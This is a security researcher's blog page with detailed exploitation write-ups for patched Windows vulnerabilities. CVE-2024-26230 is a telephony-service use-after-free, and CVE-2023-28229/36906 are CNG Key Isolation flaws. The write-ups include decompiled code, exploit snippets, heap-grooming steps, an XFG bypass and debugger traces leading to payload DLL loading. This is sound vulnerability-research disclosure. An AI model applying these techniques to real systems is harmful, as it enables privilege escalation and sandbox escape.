K0shl
A trick, the story of CVE-2024-26230
A trick, the story of CVE-2024-26230
A trick, the story of CVE-2024-26230
In April 2024, Microsoft patched a use-after-free vulnerability in the telephony service, which I reported and assigned to CVE-2024-26230. I have already completed exploitation, employing an interesting trick to bypass XFG mitigation on Windows 11.
Moving forward, in my personal blog posts regarding my vulnerability and exploitation findings, I aim not only to introduce the exploit stage but also to share my thought process on how I completed the exploitation step by step. In this blog post, I will delve into the technique behind the trick and the exploitation of CVE-2024-26230.
Root CauseThe telephony service is a RPC based service which is not running by default, but it could be actived by invoking StartServiceW API with normal user privilege.
There are only three functions in telephony RPC server interface.
long ClientAttach( [out][context_handle] void** arg_0, [in]long arg_1, [out]long *arg_2, [in][string] wchar_t* arg_3, [in][string] wchar_t* arg_4); void ClientRequest( [in][context_handle] void* arg_0, [in][out] /* [DBG] FC_CVARRAY */[size_is(arg_2)][length_is(, *arg_3)]char *arg_1/*[] CONFORMANT_ARRAY*/, [in]long arg_2, [in][out]long *arg_3); void ClientDetach( [in][out][context_handle] void** arg_0); }It's easy to understand that the ClientAttach method could create a context handle, the ClientRequest method could process requests using the specified context handle, and the ClientDetach method could release the context handle.
In fact, there is a global variable named "gaFuncs," which serves as a router variable to dispatch to specific dispatch functions within the ClientRequest method. The dispatch function it routes to depends on a value that could be controlled by an attacker.
Within the dispatch functions, numerous objects can be processed. These objects are created by the function NewObject, which inserts them into a global handle table named "ghHandleTable." Each object holds a distinct magic value. When the telephony service references an object, it invokes the function ReferenceObject to compare the magic value and retrieve it from the handle table.
The vulnerability exists with objects that possess the magic value "GOLD" which can be created by the function "GetUIDllName".
void __fastcall GetUIDllName(__int64 a1, int *a2, unsigned int a3, __int64 a4, _DWORD *a5) { [...] if ( object ) { *object = 0x474F4C44; // =====> [a] v38 = *(_QWORD *)(contexthandle + 184); *((_QWORD *)object + 10) = v38; if ( v38 ) *(_QWORD *)(v38 + 72) = object; *(_QWORD *)(contexthandle + 184) = object; // =======> [b] a2[8] = object[22]; } [...] }As the code above, service stores the magic value 0x474F4C44(GOLD) into the object[a] and inserts object into the context handle object[b].Typically, most objects are stored within the context handle object, which is initialized in the ClientAttach function. When the service references an object, it checks whether the object is owned by the specified context handle object, as demonstrated in the following code:
v28 = ReferenceObject(v27, a3, 0x494C4343); // reference the object if ( v28 && (TRACELogPrint(262146i64, "LineProlog: ReferenceObject returned ptCallClient %p", v28), *((_QWORD *)v28 + 1) == context_handle_object) // check whether the object belong to context handle object ) {However, when the "GOLD" object is freed, it doesn't check whether the object is owned by the context handle. Therefore, I can exploit this by creating two context handles: one that holds the "GOLD" object and another to invoke the dispatch function "FreeDiagInstance" to free the "GOLD" object. Consequently, the "GOLD" object is freed while the original context handle object still holds the "GOLD" object pointer.
__int64 __fastcall FreeDialogInstance(unsigned __int64 a1, _DWORD *a2) { [...] v4 = (_DWORD *)ReferenceObject(a1, (unsigned int)a2[2], 0x474F4C44i64); [...] if ( *v4 == 0x474F4C44 ) // only check if the magic value is equal to 0x474f4c44, it doesn't check if the object belong to context handle object [...] // free the object }This results in the original context handle object holding a dangling pointer. Consequently, the dispatch function "TUISPIDLLCallback" utilizes this dangling pointer, leading to a use-after-free vulnerability. As a result, the telephony service crashes when attempting to reference a virtual function.
__int64 __fastcall TUISPIDLLCallback(__int64 a1, _DWORD *a2, int a3, __int64 a4, _DWORD *a5) { [...] v7 = (unsigned int)controlledbuffer[2]; v8 = 0i64; v9 = controlledbuffer + 4; v10 = controlledbuffer + 5; if ( (unsigned int)IsBadSizeOffset(a3, 0, controlledbuffer[5], controlledbuffer[4], 4) ) goto LABEL_30; switch ( controlledbuffer[3] ) { [...] case 3: for ( freedbuffer = *(_QWORD *)(context_handle_object + 0xB8); freedbuffer; freedbuffer = *(_QWORD *)(freedbuffer + 80) ) // ===========> context handle object holds the dangling pointer at offset 0xB8 { if ( controlledbuffer[2] == *(_DWORD *)(freedbuffer + 16) ) // compare the value { v8 = *(__int64 (__fastcall **)(__int64, _QWORD, __int64, _QWORD))(freedbuffer + 32); // reference the virtual function within dangling pointer goto LABEL_27; } } break; [...] if ( v8 ) { result = v8(v7, (unsigned int)controlledbuffer[3], a4 + *v9, *v10); // ====> trigger UaF [...] }Note that the controllable buffer in the code above refers to the input buffer of the RPC client, where all content can be controlled by the attacker. This ultimately leads to a crash.
0:001> R rax=0000000000000000 rbx=0000000000000000 rcx=3064c68a8d720000 rdx=0000000000080006 rsi=0000000000000000 rdi=00000000474f4c44 rip=00007ffcb4b4955c rsp=000000ec0f9bee80 rbp=0000000000000000 r8=000000ec0f9bea30 r9=000000ec0f9bee90 r10=ffffffffffffffff r11=000000ec0f9be9e8 r12=0000000000000000 r13=00000203df002b00 r14=00000203df002b00 r15=000000ec0f9bf238 iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 tapisrv!FreeDialogInstance+0x7c: 00007ffc`b4b4955c 393e cmp dword ptr [rsi],edi ds:00000000`00000000=???????? 0:001> K # Child-SP RetAddr Call Site 00 000000ec`0f9bee80 00007ffc`b4b47295 tapisrv!FreeDialogInstance+0x7c 01 000000ec`0f9bf1e0 00007ffc`b4b4c8bc tapisrv!CleanUpClient+0x451 02 000000ec`0f9bf2a0 00007ffc`d9b85809 tapisrv!PCONTEXT_HANDLE_TYPE_rundown+0x9c 03 000000ec`0f9bf2e0 00007ffc`d9b840f6 RPCRT4!NDRSRundownContextHandle+0x21 04 000000ec`0f9bf330 00007ffc`d9bcb935 RPCRT4!DestroyContextHandlesForGuard+0xbe 05 000000ec`0f9bf370 00007ffc`d9bcb8b4 RPCRT4!OSF_ASSOCIATION::~OSF_ASSOCIATION+0x5d 06 000000ec`0f9bf3a0 00007ffc`d9bcade4 RPCRT4!OSF_ASSOCIATION::`vector deleting destructor'+0x14 07 000000ec`0f9bf3d0 00007ffc`d9bcad27 RPCRT4!OSF_ASSOCIATION::RemoveConnection+0x80 08 000000ec`0f9bf400 00007ffc`d9b8704e RPCRT4!OSF_SCONNECTION::FreeObject+0x17 09 000000ec`0f9bf430 00007ffc`d9b861ea RPCRT4!REFERENCED_OBJECT::RemoveReference+0x7e 0a 000000ec`0f9bf510 00007ffc`d9b97f5c RPCRT4!OSF_SCONNECTION::ProcessReceiveComplete+0x18e 0b 000000ec`0f9bf610 00007ffc`d9b97e22 RPCRT4!CO_ConnectionThreadPoolCallback+0xbc 0c 000000ec`0f9bf690 00007ffc`d8828f51 RPCRT4!CO_NmpThreadPoolCallback+0x42 0d 000000ec`0f9bf6d0 00007ffc`db34aa58 KERNELBASE!BasepTpIoCallback+0x51 0e 000000ec`0f9bf720 00007ffc`db348d03 ntdll!TppIopExecuteCallback+0x198 Find PrimitiveWhen I discovered this vulnerability, I quickly realized that it could be exploited because I can control the timing of both releasing and using object.
However, the first challenge of exploitation is that I need an exploit primitive. The Ring 3 world is different from the Ring 0 world. In kernel mode, I could use various objects as primitives, even if they are different types. But in user mode, I can only use objects within the same process. This means that I can't exploit the vulnerability if there isn't a suitable object in the target process.
So, I need to ensure whether there is a suitable object in the telephony service. There is a small tip that I don't even need an 'object.' What I want is just a memory allocation that I can control both size and content.
After reverse engineering, I discovered an interesting primitive. There is a dispatch function named "TRequestMakeCall" that opens the registry key of the telephony service and allocates memory to store key values.
if ( !RegOpenCurrentUser(0xF003Fu, &phkResult) ) // ==========> [a] { if ( !RegOpenKeyExW( phkResult, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", 0, 0x20019u, &hKey) ) { GetPriorityList(hKey, L"RequestMakeCall"); // ==========> [b] RegCloseKey(hKey); } /////////////////////////////////////////// if ( RegQueryValueExW(hKey, lpValueName, 0i64, &Type, 0i64, &cbData) || !cbData ) // =============> [c] { [...] } else { v6 = HeapAlloc(ghTapisrvHeap, 8u, cbData + 2); // ===========> [d] v7 = (wchar_t *)v6; if ( v6 ) { *(_WORD *)v6 = 34; LODWORD(v6) = RegQueryValueExW(hKey, lpValueName, 0i64, &Type, (LPBYTE)v6 + 2, &cbData); // ==============> [e] [...] }In the dispatch function "TRequestMakeCall," it first opens the HKCU root key [a] and invokes the GetPriorityList function to obtain the "RequestMakeCall" key value. After checking the key privilege, it's determined that this key can be fully controlled by the current user, meaning I could modify the key value. In the function "GetPriorityList," it first retrieves the type and size of the key, then allocates a heap to store the key value. This implies that if I can control the key value, I can also control both the heap size and the content of the heap.
The default type of "RequestMakeCall" is REG_SZ, but since the current user has full control privilege over it, I can delete the default value and create a REG_BINARY type key value. This allows me to set both the size and content to arbitrary values, making it a useful primitive.
Heap FengshuiAfter ensure there is a suitable primitive, I think it's time to perform heap feng shui now. Because I can control the timing of allocating, releasing, and using the object, it's easy to come up with a layout.
- First, I allocate enough "GOLD" objects using the "GetUIDllName" function.
- Then, I free some of them to create some holes using the "FreeDiagInstance" function.
- Next, I allocate a worker "GOLD" object to trigger the use-after-free vulnerability.
- After that, I free the worker object with the vulnerability. This time, the worker context handle object still holds the dangling pointer of the worker object.
- Following this, I delete the "RequestMakeCall" key value and create a REG_BINARY type key with controlled content. Then, I allocate some key value heaps to ensure they occupy the hole left by the worker object.
XFG mitigation
After the final step of heap fengshui in the previous section, the controlled key value heap occupies the target hole, and when I invoke "TUISPIDLLCallback" function to trigger the "use" step, as the pseudo code above, controlled buffer is the input buffer of RPC interface, if I set it to 3, it will compare a magic value with the worker object, then obtain a virtual function address from the worker object, so that I only need to set this two value in the content of registry key value.
RegDeleteKeyValueW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", L"RequestMakeCall"); RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities", &hkey); BYTE lpbuffer[0x5e] = { 0 }; *(PDWORD)((ULONG_PTR)lpbuffer + 0xE) = (DWORD)0x40000018; *(PULONG_PTR)((ULONG_PTR)lpbuffer + 0x1E) = (ULONG_PTR)jmpaddr; // fake pointer RegSetValueExW(hkey, L"RequestMakeCall", 0, REG_BINARY, lpbuffer, 0x5E);It seems that there is only one step left to complete the exploitation. I can control the address of the virtual function, which means I can control the RIP register. I can use ROP if there isn't XFG mitigation. However, XFG will limit the RIP register from jumping to a ROP gadget address, causing an INT29 exception when the control flow check fails.
Last step, the truely challengeJust like the exploitation I introduced in my previous blog post—the exploitation of CNG key isolation—when I can control the RIP, it's useful to invoke LoadLibrary to load the payload DLL. However, I quickly encountered some challenges this time when attempting to set the virtual address to the LoadLibrary address.
Let's review the virtual function call in "TUISPIDLLCallback" dispatch function:
result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF- The first parameter is a DWORD type value which is obtained from a RPC input buffer which could be controlled by client.
- The second parameter is also obtained from a RPC input buffer, but it must be a const value, it's equal to the case number I mentioned in previous section, it must be 3.
- The third parameter is a pointer. The buffer is the controlled buffer address with an added offset of 0x3C. Additionally, this pointer will have an offset added to it, which is obtained from the controlled RPC input buffer.
- The fourth parameter is a DWORD type that obtained from a controlled RPC input buffer.
It's evident that in order to jump to LoadLibrary to load the payload DLL, the first parameter should be a pointer pointing to the payload DLL path. However, in this situation, it's a DWORD type value.
So I can't use LoadLibrary directly to load payload DLL, I need to find out another way to complete the exploitation. At this time, I want to find a indirectly function to load payload DLL, because the third parameter is a pointer and the content of it I could control, I need a function has the following code:
func(a1, a2, a3, ...){ [...] path = a3; LoadLibarary(path); [...] }The limitation in this scenario is that I can't control which DLL is loaded in the RPC server. Therefore, I can only use existing DLLs in the RPC server, which takes some time for me to find an eligible function. But it's failed to find an eligible function.
It seems like we're back to the beginning. I'm reviewing some APIs in MSDN again, hoping to find another scenario.
The trickAfter some time, I remember an interesting API -- VirtualAlloc.
LPVOID VirtualAlloc( [in, optional] LPVOID lpAddress, [in] SIZE_T dwSize, [in] DWORD flAllocationType, [in] DWORD flProtect );The first parameter of VirtualAlloc is lpAddress, which can be set to a specified value, and the process will allocate memory at this address.
I notice that I can allocate a 32-bits address with this function!
The second parameter is a constant value representing the buffer size to allocate. However, it's not necessary for my purpose. The last parameter is a controlled DWORD value, which I can set to the value for flProtect. I could set it to PAGE_EXECUTE_READWRITE (0x40).
But a new challenge arises with the third parameter.
The third parameter is flAllocationType, and in my scenario, it's a pointer. This implies that the low 32 bits of the pointer should be the flAllocationType. I need to set it to MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000). Although I can control the offset, I don't know the address of the pointer, so I can't set the low 32 bits of the pointer to a specified value. I tried allocating the heap with some random value, but all of it failed.
Let's review the "use" code again:
result = v8((unsigned int)controlledbuffer[2], (unsigned int)controlledbuffer[3], buffer + *(controlledbuffer + 4), *(controlledbuffer + 5)); // ====> trigger UaF if(!result){ [...] } *controlledbuffer = result; return result;The virtual function return value will be stored into the controlled buffer, which will then be returned to the client. This means that if I allocate memory using a function such as MIDL_user_allocate, it will return a 64-bit address, but only the low 32 bits of the address will be returned to the client. This will be a useful information disclosure.
But I still can't predict the low 32-bits value of the third parameter when invoking VirtualAlloc. So, I tried increasing the allocate buffer size to find out if there is any regularity. Actually, the maximum size of the RPC client could be set is larger than 0x40000000. When I set the allocate size to 0x40000000, I found an interesting situation.
I find out that when the allocate size is set to 0x40000000, the low 32-bits address of the pointer increases linearly, which makes it predictable.
That means, for example, if the leaked low 32-bits return 0xbd700000, I know that if I set the input buffer size to 0x40000000, the next controlled buffer's low 32-bits will be 0xfd800000. Additionally, the offset of the third parameter couldn't be larger than the input buffer size. Therefore, I need to ensure that the low 32-bits address is larger than 0xc0000000. In this way, the low 32-bits of the third parameter could be a DWORD value larger than 0x100000000 after the address is added with the offset. It's possible to set the third parameter to 0x3000 (MEM_COMMIT(0x1000) | MEM_RESERVE(0x2000)).
As for now, I make heap fengshui and control the all content of the heap hole with the controllable registry key value, and for bypassing XFG mitigation, I need to first leak the low 32-bits address by setting the MIDL_user_allocate function address in key value, and then set the VirtualAlloc function address in key value, obviously, it doesn't end if I allocate 32-bits address succeed, I need to invoke "TUISPIDLLCallback" multiple times to complete bypassing XFG mitigation. The good news is that I could control the timing of "use", so all I need to do is free the registry key value heap, set the new key value with the target function address, allocate a new key value heap, and use it again.
tapisrv!TUISPIDLLCallback+0x1cc: 00007fff`7c27fecc ff154ee80000 call qword ptr [tapisrv!_guard_xfg_dispatch_icall_fptr (00007fff`7c28e720)] ds:00007fff`7c28e720={ntdll!LdrpDispatchUserCallTarget (00007fff`afcded40)} 0:007> u rax KERNEL32!VirtualAllocStub: 00007fff`aeae3bf0 48ff2551110700 jmp qword ptr [KERNEL32!_imp_VirtualAlloc (00007fff`aeb54d48)] 00007fff`aeae3bf7 cc int 3 00007fff`aeae3bf8 cc int 3 00007fff`aeae3bf9 cc int 3 00007fff`aeae3bfa cc int 3 00007fff`aeae3bfb cc int 3 00007fff`aeae3bfc cc int 3 00007fff`aeae3bfd cc int 3 0:007> r r8d r8d=3000 0:007> r r9d r9d=40 0:007> r rcx rcx=00000000ba000000 0:007> r rdx rdx=0000000000000003According to the debugging information, we can see that every parameter satisfies the request. After invoking the VirtualAlloc function, we have successfully allocated a 32-bit address.
0:007> p tapisrv!TUISPIDLLCallback+0x1d2: 00007fff`7c27fed2 85c0 test eax,eax 0:007> dq ba000000 00000000`ba000000 00000000`00000000 00000000`00000000 00000000`ba000010 00000000`00000000 00000000`00000000 00000000`ba000020 00000000`00000000 00000000`00000000 00000000`ba000030 00000000`00000000 00000000`00000000 00000000`ba000040 00000000`00000000 00000000`00000000This means I have successfully controlled the first parameter as a pointer. The next step is to copy the payload DLL path into the 32-bit address. However, I can't use the memcpy function because the second parameter is a constant value, which must be 3. Instead, I decide to use the memcpy_s function, where the second parameter represents the copy length and the third parameter is the source address. I can only copy 3 bytes at a time, but I can invoke it multiple times to complete the path copying.
0:009> dc ba000000 00000000`ba000000 003a0043 0055005c 00650073 00730072 C.:.\.U.s.e.r.s. 00000000`ba000010 0070005c 006e0077 0041005c 00700070 \.p.w.n.\.A.p.p. 00000000`ba000020 00610044 00610074 0052005c 0061006f D.a.t.a.\.R.o.a. 00000000`ba000030 0069006d 0067006e 0066005c 006b0061 m.i.n.g.\.f.a.k. 00000000`ba000040 00640065 006c006c 0064002e 006c006c e.d.l.l...d.l.l.There is one step last is invoking LoadLibrary to load payload DLL.
0:009> u KERNELBASE!LoadLibraryW: 00007fff`ad1f2480 4533c0 xor r8d,r8d 00007fff`ad1f2483 33d2 xor edx,edx 00007fff`ad1f2485 e9e642faff jmp KERNELBASE!LoadLibraryExW (00007fff`ad196770) 00007fff`ad1f248a cc int 3 00007fff`ad1f248b cc int 3 00007fff`ad1f248c cc int 3 00007fff`ad1f248d cc int 3 00007fff`ad1f248e cc int 3 0:009> dc rcx 00000000`ba000000 003a0043 0055005c 00650073 00730072 C.:.\.U.s.e.r.s. 00000000`ba000010 0070005c 006e0077 0041005c 00700070 \.p.w.n.\.A.p.p. 00000000`ba000020 00610044 00610074 0052005c 0061006f D.a.t.a.\.R.o.a. 00000000`ba000030 0069006d 0067006e 0066005c 006b0061 m.i.n.g.\.f.a.k. 00000000`ba000040 00640065 006c006c 0064002e 006c006c e.d.l.l...d.l.l. 00000000`ba000050 00000000 00000000 00000000 00000000 ................ 00000000`ba000060 00000000 00000000 00000000 00000000 ................ 00000000`ba000070 00000000 00000000 00000000 00000000 ................ 0:009> k # Child-SP RetAddr Call Site 00 000000ab`ac97eac8 00007fff`7c27fed2 KERNELBASE!LoadLibraryW 01 000000ab`ac97ead0 00007fff`7c27817a tapisrv!TUISPIDLLCallback+0x1d2 02 000000ab`ac97eb60 00007fff`afb57f13 tapisrv!ClientRequest+0xba
Isolate me from sandbox - Explore elevation of privilege of CNG Key Isolation
Isolate me from sandbox - Explore elevation of privilege of CNG Key Isolation
Isolate me from sandbox - Explore elevation of privilege of CNG Key Isolation
In recently months, Microsoft patched vulnerabilities I reported in CNG Key Isolation service, assigned CVE-2023-28229 and CVE-2023-36906, the CVE-2023-28229 included 6 use after free vulenrabilities with similar root cause and the CVE-2023-36906 is a out of bound read information disclosure. Microsoft marked them as "Exploitation Less Likely" in assessment status, but actually, I completed the exploitation with these two vulnerabilities.
As an annual update blogger(sorry for that:P), I share this blogpost to introduce my exploitation on CNG Key Isolation service, so let's start our journey!
Simple OverviewCNG Key Isolation is a service under lsass process which provides key process isolation to private keys, the CNG Key Isolation is worked as a RPC server that could be accessed with the Appcontainer Integrity process such as the render process in adobe or firefox. There are some important objects in keyiso service, let's go through them simply as following:
- Context object. Context object is just like the manage object of keyiso RPC server, it will hold the provider object when the client invoke open storage provider to create a new provider object and it is managed by a global list named SrvCryptContextList. This object must be intialized first.
- Provider object. Client should open an existed provider in a collection of all of the providers, if the provider open succeed, it will allocate the provider object and store the pointer into the context object.
- Key object. Key object is managed by context object, it will be allocated and inserted into the context object.
- Memory Buffer object. Memory Buffer object is managed by context object, it will be allocate and inserted into the context object.
- Secret object. Secret object is managed by context object, it will be allocate and inserted into the context object.
In these four objects, provider object/key object/secret object have similar object structure, offset 0x0 of the object stores the magic value, 0x44444446 means provider object, 0x44444447 means key object, 0x44444449 means secret object, when these objects freed, the magic value will be set to another value, offset 0x8 of the object stores the reference count, and offset 0x30 of the object stores the index of the object, this index is just like the handle of the object, it will be a flag when client use it to search the specified object which means the object is predictable, it is begin at 0 and when a new object allocated, it will add 1.
There is additional information to talk about how I win the race with the handle of object, when I review the code, I noticed that the handle could be predictable, let's check the SrvAddKeyToList function:
SrvAddKeyToList: handlevalue = ++*(_QWORD *)(context_object + 0xA0); // =====> [a] *(_QWORD *)(key_object + 0x30) = handlevalue; // =====> [b] SrvFreeKey: if ( *((_QWORD *)key_object + 6) == handlevalue ) // ====> [c] break;The handle value is stored in the offset 0xA0 of context object, and in fact, the handle value is just like a index value, the initilized value is 0, and when a new key object is allocated, the index will add 1 [a] and be set to the offset 0x30 of new key object [b]. When the key object is freed, it will compare the handle value, if it matched [c], it will continue to hit vulnerable code. So the handle value could be predictable, for example, you could call SrvFreeKey with the handle value is 1 when you create the first key, or you could call the SrvFreeKey with the handle value is 10 when you create the No.10 key object, so that the key object could be retrieved in FreeKey function when adding key to context object with the new handle value.
I make the following simple chart to show you the relationship between theses objects.
Root cause of CVE-2023-28229
In this section, I will introduce the root cause of CVE-2023-28299, I will use the key object as example, actually the rest of objects have similar issue.
When I do researching on keyiso service, I find out that each object has their own allocate and free interface, such as key object, there are the allocate RPC interface named s_SrvRpcCryptCreatePersistedKey and the free RPC interface named s_SrvRpcCryptFreeKey. And I quickly notice that there is an issue between object allocate and free.
__int64 __fastcall SrvCryptCreatePersistedKey( struct _RTL_CRITICAL_SECTION *a1, __int64 a2, _QWORD *a3, __int64 a4, __int64 a5, int a6, int a7) { [...] keyobject = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 0x38ui64); [...] *((_DWORD *)keyobject + 1) = 0; *(_DWORD *)keyobject = 0x44444447; *((_DWORD *)keyobject + 2) = 1; // ==========> [a] *((_QWORD *)keyobject + 4) = v12; SrvAddKeyToList((__int64)a1, (__int64)keyobject); // =============> [b] v11 = 0; *a3 = *((_QWORD *)keyobject + 6); return v11; [...] } __int64 __fastcall SrvCryptFreeKey(__int64 a1, __int64 a2, __int64 a3) { [...] if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 ) // ============> [c] { v17 = SrvFreeKey((PVOID)freebuffer); // ===============> [d] if ( v17 < 0 ) DebugTraceError( (unsigned int)v17, "Status", "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c", 700i64); } if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 ) // ===============> [e] { v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))( // ==============> [f] *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64), *((_QWORD *)freebuffer + 5)); v13 = v12; [...] }When the client invoke allocate RPC interface, keyiso will allocate a heap from proccess heap and intialize the structure, it will set the reference count of key object to 1 first [a], then it will add the key object to context object, and add the reference count [b], and when client free the key object, keyiso will check if the reference is 1 [c], if it is, keyiso will free the key object [d], but it still use the key object after free [e], then it will call the function in vftable.
There aren't lock function when the reference count of key object is initialized to 1 and added, which means there is a time window between the intialization and addition, the key object will be freed [c] [d] after the reference count is set to 1 [a], and it could pass the next check [e] when reference count add 1 [b], finally, it will cause the use after free when the function of vftable called[f].
I wrote the PoC and figured out that it may be exploitable, but as the code show below, the function of vftable is picked from the pointer stored in offset 0x20 of the keyobject which means even I could control the free buffer, I still need a validate address in the offset 0x20 of the key object. I need a information disclosure.
Root Cause of CVE-2023-36906Then I try to find out a information disclosure, I go through the RPC interface and find out there is a property structure which is stored in provider object, and the property could be query and set with the RPC interface SPCryptSetProviderProperty and SPCryptGetProviderProperty.
__int64 __fastcall SPCryptSetProviderProperty(__int64 a1, const wchar_t *a2, _DWORD *a3, unsigned int a4, int a5) { [...] if ( !wcscmp_0(a2, L"Use Context") ) { v15 = *(void **)(v8 + 32); if ( v15 ) RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v15); Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, v6); *(_QWORD *)(v8 + 32) = Heap; if ( !Heap ) { v10 = 1450i64; LABEL_21: v9 = -2146893810; v11 = 2148073486i64; goto LABEL_42; } v17 = Heap; goto LABEL_40; } memcpy_0(v17, a3, v6); // ============> [b] } [...] } __int64 __fastcall SPCryptGetProviderProperty( __int64 a1, const wchar_t *a2, _DWORD *a3, unsigned int a4, unsigned int *a5, int a6) { [...] if ( !wcscmp_0(a2, L"Use Context") ) { v17 = *(_QWORD *)(v10 + 32); v15 = 21; if ( !v17 ) goto LABEL_31; do ++v13; while ( *(_WORD *)(v17 + 2 * v13) ); // =============> [c] v16 = 2 * v13 + 2; if ( 2 * (_DWORD)v13 == -2 ) { LABEL_31: v11 = 517i64; LABEL_32: v9 = -2146893807; v12 = 2148073489i64; goto LABEL_57; } v25 = *(const void **)(v10 + 32); memcpy_0(a3, v25, v16); // ============> [d] } [...] }The client could specific which property to set, if the property named "Use Context", it will allocate a new buffer with the size which could be controlled by client, and store the "Use Context" buffer into the provider object, but when I review the query code, I notice that the "Use Context" should be a string type, it will go through the buffer in a while loop and break when it meets the null charactor [c], then return the whole buffer to client.
There will be a out of bound read when I set the "Use Context" property with a non-zero content in buffer, and actually, this property is a good object for exploitation because the size and content of the buffer could be controlled by client.
Exploitation stageNow, I have a out of bound read which could leak the content of adjacent object and a use after free elevation privilege could call arbitrary address if I could control the free buffer. I think it's time for me to chain the vulnerability.
I look back to the free buffer to find out what I need first:
v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))( *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64), *((_QWORD *)freebuffer + 5));If I could control the freebuffer, and I have a useful address, I could set this address to the offset 0x20 of freebuffer, and there are two important address in the validate address, the offset 0x80 of the address should be a validate function address, and the offset 0x118 should be another buffer.
The lsass process enable the XFG mitigation, so I couldn't use ROP in this exploitation, but if I could control the first parameter of the function, I could use LoadLibraryW to load a controlled dll path, so the target is set offset 0x80 of validate address to LoadlibraryW address and set the payload dll to the address which stored in offset 0x118 of the address.
As I introduce in the previous section, the property "Use Context" is a good primitive object because I could control the size and whole content of this property, and I have a out of bound read issue, so the question is what object should be adjacent to my property object?
I review all objects of keyiso, and find out the memory buffer may be a useful target.
v7 = SrvLookupAndReferenceProvider(hContext, hProvider, 0); [...] _InterlockedIncrement((volatile signed __int32 *)(v7 + 8)); *(_QWORD *)Heap = v7; // ===========> [a] *((_QWORD *)Heap + 1) = v32; SrvAddMemoryBufferToList((__int64)hContext, (__int64)Heap); v26 = *((_QWORD *)Heap + 4); Heap = 0i64; *v15 = v26;When the memory buffer created, keyiso will look up the provider object and store the provider object in the offset 0x0 of the memory buffer[a], so if I fill up property object with non-zero value and when I query the property object, it will leak the provider object address.
And of course, different objects have different size, I don't need to worry about the different object influence the layout when I do heap fengshui.
Finally, I figure out the exploitation scenario as following:
- Spray the provider object and memory buffer object. Provider object is for the finaly stage of explointation, and memory buffer is for leak the provider object.
- Free some memory buffer objects to make a heap hole, then allocate property with the same size of memory buffer object, it will occupy one of the freed holes, and then query the property to get the provider object address.
- Free enough provider objects to make sure the leaked provider object is freed, and spray the properties with the same size of provider object to occupy the leaked provider object address. The LoadlibraryW address and payload dll should be stored in the offset 0x80 and offset 0x118 in the fake provider object. But I only have one leaked address, I could set the payload dll path in another offset in property buffer, and set the address in the offset 0x118 of property buffer.
- Finally, I could trigger use after free with mutiple three diffrent threads, Thread A is for allocating the key object, Thread B is for releasing the key object, Thread C is for allocating the property object with the same size of key object, and set the fake reference count and leaked property address in offset 0x20 of property buffer.
When client win the race which means the property object occupy the key object hole after key object freed at SrvFreeKey function, it will finally load arbitrary dll in lsass process which finally cause appcontainer sandbox escape.
PatchMicrosoft patch with adding the lock functions between the key object intialized and freed.
Before:
[...] RtlLeaveCriticalSection(v5); if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 ) { v17 = SrvFreeKey((PVOID)freebuffer); if ( v17 < 0 ) DebugTraceError( (unsigned int)v17, "Status", "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c", 700i64); } if ( _InterlockedExchangeAdd(freebuffer + 2, 0xFFFFFFFF) == 1 ) { v12 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)freebuffer + 4) + 0x80i64))( *(_QWORD *)(*((_QWORD *)freebuffer + 4) + 0x118i64), *((_QWORD *)freebuffer + 5)); [...]After:
[...] RtlEnterCriticalSection(v8); v12 = *((_QWORD *)v9 + 2); if ( *(volatile signed __int64 **)(v12 + 8) != v9 + 2 || (v13 = (volatile signed __int64 **)*((_QWORD *)v9 + 3), *v13 != v9 + 2) ) { __fastfail(3u); } *v13 = (volatile signed __int64 *)v12; *(_QWORD *)(v12 + 8) = v13; if ( _InterlockedExchangeAdd64(v9 + 1, 0xFFFFFFFFFFFFFFFFui64) == 1 ) { v14 = SrvFreeKey(v9); if ( v14 < 0 ) DebugTraceError( (unsigned int)v14, "Status", "onecore\\ds\\security\\cryptoapi\\ncrypt\\iso\\service\\srvutils.c", 705i64); } RtlLeaveCriticalSection(v8); if ( _InterlockedExchangeAdd64(v9 + 1, 0xFFFFFFFFFFFFFFFFui64) == 1 ) { v15 = (*(__int64 (__fastcall **)(_QWORD, _QWORD))(*((_QWORD *)v9 + 4) + 128i64))( *(_QWORD *)(*((_QWORD *)v9 + 4) + 280i64), *((_QWORD *)v9 + 5)); [...]Thanks for discussing with @chompie1337, @DannyOdler and @cplearns2h4ck. Actually even after patch, there should be UAF after SrvFreeKey get called, because SrvFreeKey function must free the key object but there still be a reference after the function returned, but the function seems never could be called, this is weird code that I don't know why Microsoft designed it like this, but after they add lock function between key object is intialized and freed, the UAF race condition got fixed.
Break me out of sandbox in old pipe - CVE-2022-22715 Windows Dirty Pipe
Break me out of sandbox in old pipe - CVE-2022-22715 Windows Dirty Pipe
Break me out of sandbox in old pipe - CVE-2022-22715 Windows Dirty Pipe
In February 2022, Microsoft patched the vulnerability I used in TianfuCup 2021 for escaping Adobe Reader sandbox, assigned CVE-2022-22715. The vulnerability existed in Named Pipe File System nearly 10 years since the AppContainer was born. We called it "Windows Dirty Pipe".
In this article, I will share the root cause and exploitation of Windows Dirty Pipe. So let's start our journey.
